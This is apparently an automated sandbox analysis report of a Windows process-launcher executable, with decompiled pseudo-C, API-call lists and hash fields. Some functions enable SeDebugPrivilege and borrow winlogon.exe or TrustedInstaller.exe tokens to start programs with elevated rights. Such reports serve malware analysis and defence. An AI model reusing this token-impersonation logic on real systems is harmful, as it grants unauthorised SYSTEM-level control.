                                                                                                        0x004027b8
                                                                                                        0x004027bb
                                                                                                        0x004027bf
                                                                                                        0x004027c6
                                                                                                        0x004027c6
                                                                                                        0x004027d1
                                                                                                        0x004027d6
                                                                                                        0x004027d9
                                                                                                        0x004027db
                                                                                                        0x004027e2
                                                                                                        0x004027e4
                                                                                                        0x004027e4
                                                                                                        0x004027e7
                                                                                                        0x004027f4
                                                                                                        0x004027fc
                                                                                                        0x00402801
                                                                                                        0x00402801
                                                                                                        0x00402803
                                                                                                        0x00402803
                                                                                                        0x00402806
                                                                                                        0x00000000
                                                                                                        0x00402806
                                                                                                        0x00402715
                                                                                                        0x00402729
                                                                                                        0x0040272e
                                                                                                        0x00402731
                                                                                                        0x00402738
                                                                                                        0x00402738
                                                                                                        0x00402743
                                                                                                        0x00402748
                                                                                                        0x0040274d
                                                                                                        0x00402754
                                                                                                        0x00402756
                                                                                                        0x00402756
                                                                                                        0x00402759
                                                                                                        0x00402763
                                                                                                        0x00000000
                                                                                                        0x00402763
                                                                                                        0x004026fb
                                                                                                        0x00402700
                                                                                                        0x00402702
                                                                                                        0x00000000
                                                                                                        0x00402702
                                                                                                        0x004026ec
                                                                                                        0x00000000
                                                                                                        0x004026ec
                                                                                                        0x004026dd
                                                                                                        0x00000000
                                                                                                        0x004026dd
                                                                                                        0x004026ce
                                                                                                        0x00000000
                                                                                                        0x004026ce
                                                                                                        0x004026ac
                                                                                                        0x00402443
                                                                                                        0x0040246a
                                                                                                        0x00402470
                                                                                                        0x00000000
                                                                                                        0x00402470

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00402300
                                                                                                        • memset.MSVCRT ref: 0040233E
                                                                                                        • memset.MSVCRT ref: 00402356
                                                                                                          • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                          • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                        • wcschr.MSVCRT ref: 00402387
                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                          • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                          • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                        • wcschr.MSVCRT ref: 004023B7
                                                                                                        • memset.MSVCRT ref: 004023D9
                                                                                                        • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                        • wcschr.MSVCRT ref: 0040242B
                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                        • memset.MSVCRT ref: 004024BE
                                                                                                        • memset.MSVCRT ref: 004024D1
                                                                                                        • _wtoi.MSVCRT ref: 00402519
                                                                                                        • _wtoi.MSVCRT ref: 0040252B
                                                                                                        • memset.MSVCRT ref: 00402561
                                                                                                        • memset.MSVCRT ref: 00402574
                                                                                                        • _wtoi.MSVCRT ref: 004025BC
                                                                                                        • _wtoi.MSVCRT ref: 004025CE
                                                                                                        • wcschr.MSVCRT ref: 004025F0
                                                                                                        • memset.MSVCRT ref: 0040260F
                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                        • _snwprintf.MSVCRT ref: 0040264C
                                                                                                        • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                        • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                        • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                        • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                        • API String ID: 2452314994-435178042
                                                                                                        • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                        • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                        • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                        • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12); // executed
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}





































                                                                                                        0x00408533
                                                                                                        0x00408533
                                                                                                        0x00408536
                                                                                                        0x0040853e
                                                                                                        0x00408546
                                                                                                        0x0040854d
                                                                                                        0x00408559
                                                                                                        0x00408563
                                                                                                        0x00408569
                                                                                                        0x00408572
                                                                                                        0x00408583
                                                                                                        0x0040858d
                                                                                                        0x00408595
                                                                                                        0x0040859e
                                                                                                        0x004085a2
                                                                                                        0x004085a6
                                                                                                        0x004085aa
                                                                                                        0x004085ae
                                                                                                        0x004085b8
                                                                                                        0x004085c1
                                                                                                        0x004085c8
                                                                                                        0x004085cd
                                                                                                        0x004085cf
                                                                                                        0x0040867f
                                                                                                        0x00408688
                                                                                                        0x0040868d
                                                                                                        0x0040868f
                                                                                                        0x00408730
                                                                                                        0x00408735
                                                                                                        0x00408737
                                                                                                        0x0040873d
                                                                                                        0x00408750
                                                                                                        0x0040875d
                                                                                                        0x00408763
                                                                                                        0x00408770
                                                                                                        0x00408775
                                                                                                        0x00408779
                                                                                                        0x0040878b
                                                                                                        0x00408790
                                                                                                        0x004087a2
                                                                                                        0x004087aa
                                                                                                        0x004087b8
                                                                                                        0x004087be
                                                                                                        0x004087c3
                                                                                                        0x004087c9
                                                                                                        0x004087d2
                                                                                                        0x004087df
                                                                                                        0x004087e3
                                                                                                        0x004087e6
                                                                                                        0x00408801
                                                                                                        0x004087e8
                                                                                                        0x004087f8
                                                                                                        0x004087fe
                                                                                                        0x00408811
                                                                                                        0x00408816
                                                                                                        0x00408816
                                                                                                        0x0040881c
                                                                                                        0x00408822
                                                                                                        0x00408779
                                                                                                        0x00408824
                                                                                                        0x00408829
                                                                                                        0x00408833
                                                                                                        0x00408834
                                                                                                        0x00408840
                                                                                                        0x00408848
                                                                                                        0x0040884c
                                                                                                        0x00408850
                                                                                                        0x00408855
                                                                                                        0x0040885a
                                                                                                        0x00408860
                                                                                                        0x004088ac
                                                                                                        0x004088b1
                                                                                                        0x004088b3
                                                                                                        0x004088bf
                                                                                                        0x004088c5
                                                                                                        0x004088cb
                                                                                                        0x004088da
                                                                                                        0x004088ea
                                                                                                        0x004088ed
                                                                                                        0x004088f8
                                                                                                        0x004088ff
                                                                                                        0x00408905
                                                                                                        0x004088b5
                                                                                                        0x004088b5
                                                                                                        0x004088b5
                                                                                                        0x00000000
                                                                                                        0x00408862
                                                                                                        0x00408862
                                                                                                        0x0040886d
                                                                                                        0x00408874
                                                                                                        0x0040887b
                                                                                                        0x00408882
                                                                                                        0x00408889
                                                                                                        0x00408895
                                                                                                        0x00408897
                                                                                                        0x00408658
                                                                                                        0x00408658
                                                                                                        0x0040865d
                                                                                                        0x00408661
                                                                                                        0x0040866a
                                                                                                        0x00408673
                                                                                                        0x00408678
                                                                                                        0x00000000
                                                                                                        0x00408678
                                                                                                        0x00408860
                                                                                                        0x00408695
                                                                                                        0x00408695
                                                                                                        0x0040869f
                                                                                                        0x004086a2
                                                                                                        0x004086af
                                                                                                        0x004086a4
                                                                                                        0x004086a7
                                                                                                        0x004086a7
                                                                                                        0x004086b4
                                                                                                        0x004086bf
                                                                                                        0x004086cb
                                                                                                        0x004086d3
                                                                                                        0x004086d7
                                                                                                        0x004086db
                                                                                                        0x004086e0
                                                                                                        0x004086f1
                                                                                                        0x004086f8
                                                                                                        0x004086ff
                                                                                                        0x00408706
                                                                                                        0x0040870d
                                                                                                        0x00408719
                                                                                                        0x0040871b
                                                                                                        0x00000000
                                                                                                        0x0040871b
                                                                                                        0x004085d5
                                                                                                        0x004085da
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004085ec
                                                                                                        0x004085ef
                                                                                                        0x004085f6
                                                                                                        0x004085fd
                                                                                                        0x00408604
                                                                                                        0x0040860b
                                                                                                        0x00408612
                                                                                                        0x00408616
                                                                                                        0x00408620
                                                                                                        0x0040862a
                                                                                                        0x00408632
                                                                                                        0x00408633
                                                                                                        0x00408638
                                                                                                        0x0040864a
                                                                                                        0x0040864f
                                                                                                        0x00408651
                                                                                                        0x00000000
                                                                                                        0x0040854f
                                                                                                        0x0040854f
                                                                                                        0x00408550
                                                                                                        0x00408556
                                                                                                        0x00408556

                                                                                                        APIs
                                                                                                          • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                          • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                          • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                          • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                        • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                        • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                        • swscanf.MSVCRT ref: 00408620
                                                                                                        • _wtoi.MSVCRT ref: 00408633
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                        • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                        • API String ID: 3933224404-3784219877
                                                                                                        • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                        • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                        • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                        • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 81%
                                                                                                        			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                        0x00401fe6
                                                                                                        0x00401ff1
                                                                                                        0x00401ff3
                                                                                                        0x00401fff
                                                                                                        0x00402002
                                                                                                        0x004020a8
                                                                                                        0x004020ab
                                                                                                        0x004020f3
                                                                                                        0x004020f6
                                                                                                        0x00402162
                                                                                                        0x00402165
                                                                                                        0x004021f2
                                                                                                        0x004021f5
                                                                                                        0x00402235
                                                                                                        0x00402238
                                                                                                        0x004022be
                                                                                                        0x0040223a
                                                                                                        0x0040223a
                                                                                                        0x00402240
                                                                                                        0x0040224b
                                                                                                        0x0040224e
                                                                                                        0x00402251
                                                                                                        0x00402254
                                                                                                        0x00402259
                                                                                                        0x0040225e
                                                                                                        0x00402262
                                                                                                        0x00402264
                                                                                                        0x00402264
                                                                                                        0x00402264
                                                                                                        0x00402262
                                                                                                        0x00402266
                                                                                                        0x0040226c
                                                                                                        0x00402271
                                                                                                        0x00402274
                                                                                                        0x00402276
                                                                                                        0x0040229a
                                                                                                        0x0040229a
                                                                                                        0x00402278
                                                                                                        0x00402296
                                                                                                        0x00402296
                                                                                                        0x0040229c
                                                                                                        0x0040229c
                                                                                                        0x004022c0
                                                                                                        0x004022c2
                                                                                                        0x004022c8
                                                                                                        0x004022c8
                                                                                                        0x004022c8
                                                                                                        0x00000000
                                                                                                        0x004022c0
                                                                                                        0x00402201
                                                                                                        0x00402203
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402220
                                                                                                        0x00402225
                                                                                                        0x00402227
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040222d
                                                                                                        0x00000000
                                                                                                        0x0040222d
                                                                                                        0x00402173
                                                                                                        0x00402179
                                                                                                        0x0040217b
                                                                                                        0x0040217e
                                                                                                        0x00402183
                                                                                                        0x00402185
                                                                                                        0x00402188
                                                                                                        0x0040218d
                                                                                                        0x0040218f
                                                                                                        0x00402192
                                                                                                        0x004021a2
                                                                                                        0x004021a7
                                                                                                        0x004021a9
                                                                                                        0x004021ac
                                                                                                        0x004021cc
                                                                                                        0x004021d1
                                                                                                        0x004021d3
                                                                                                        0x004021db
                                                                                                        0x004021db
                                                                                                        0x004021e1
                                                                                                        0x004021e1
                                                                                                        0x004021e7
                                                                                                        0x004021e7
                                                                                                        0x00000000
                                                                                                        0x00402192
                                                                                                        0x004020fe
                                                                                                        0x00402103
                                                                                                        0x00402105
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402111
                                                                                                        0x00402114
                                                                                                        0x00000000
                                                                                                        0x00402114
                                                                                                        0x004020ad
                                                                                                        0x004020b4
                                                                                                        0x004020b9
                                                                                                        0x004020bc
                                                                                                        0x00000000
                                                                                                        0x004020c2
                                                                                                        0x004020c4
                                                                                                        0x004020ce
                                                                                                        0x004020d0
                                                                                                        0x004020d3
                                                                                                        0x004020d4
                                                                                                        0x004020d5
                                                                                                        0x004020e6
                                                                                                        0x004020e7
                                                                                                        0x004020d7
                                                                                                        0x004020d7
                                                                                                        0x004020dd
                                                                                                        0x004020de
                                                                                                        0x004020df
                                                                                                        0x004020df
                                                                                                        0x004020ec
                                                                                                        0x004020ef
                                                                                                        0x00000000
                                                                                                        0x004020ef
                                                                                                        0x00402008
                                                                                                        0x00402016
                                                                                                        0x0040201d
                                                                                                        0x0040202e
                                                                                                        0x00402035
                                                                                                        0x00402044
                                                                                                        0x00402049
                                                                                                        0x00402055
                                                                                                        0x00402064
                                                                                                        0x00402068
                                                                                                        0x0040206e
                                                                                                        0x0040208b
                                                                                                        0x00402070
                                                                                                        0x00402082
                                                                                                        0x00402088
                                                                                                        0x0040209e
                                                                                                        0x004020a1
                                                                                                        0x00402119
                                                                                                        0x00402119
                                                                                                        0x0040211b
                                                                                                        0x0040211e
                                                                                                        0x0040211e
                                                                                                        0x00402149
                                                                                                        0x00402151
                                                                                                        0x00402151
                                                                                                        0x00402157
                                                                                                        0x00402157
                                                                                                        0x004022cb
                                                                                                        0x004022d2
                                                                                                        0x004022d2

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040201D
                                                                                                        • memset.MSVCRT ref: 00402035
                                                                                                          • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                          • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                        • wcslen.MSVCRT ref: 00402050
                                                                                                        • wcslen.MSVCRT ref: 0040205F
                                                                                                        • wcslen.MSVCRT ref: 004020B4
                                                                                                        • _wtoi.MSVCRT ref: 004020D7
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                        • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                        • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                          • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                          • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                          • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                          • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                          • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                          • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                          • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                          • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                          • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                          • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                          • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                          • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                          • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
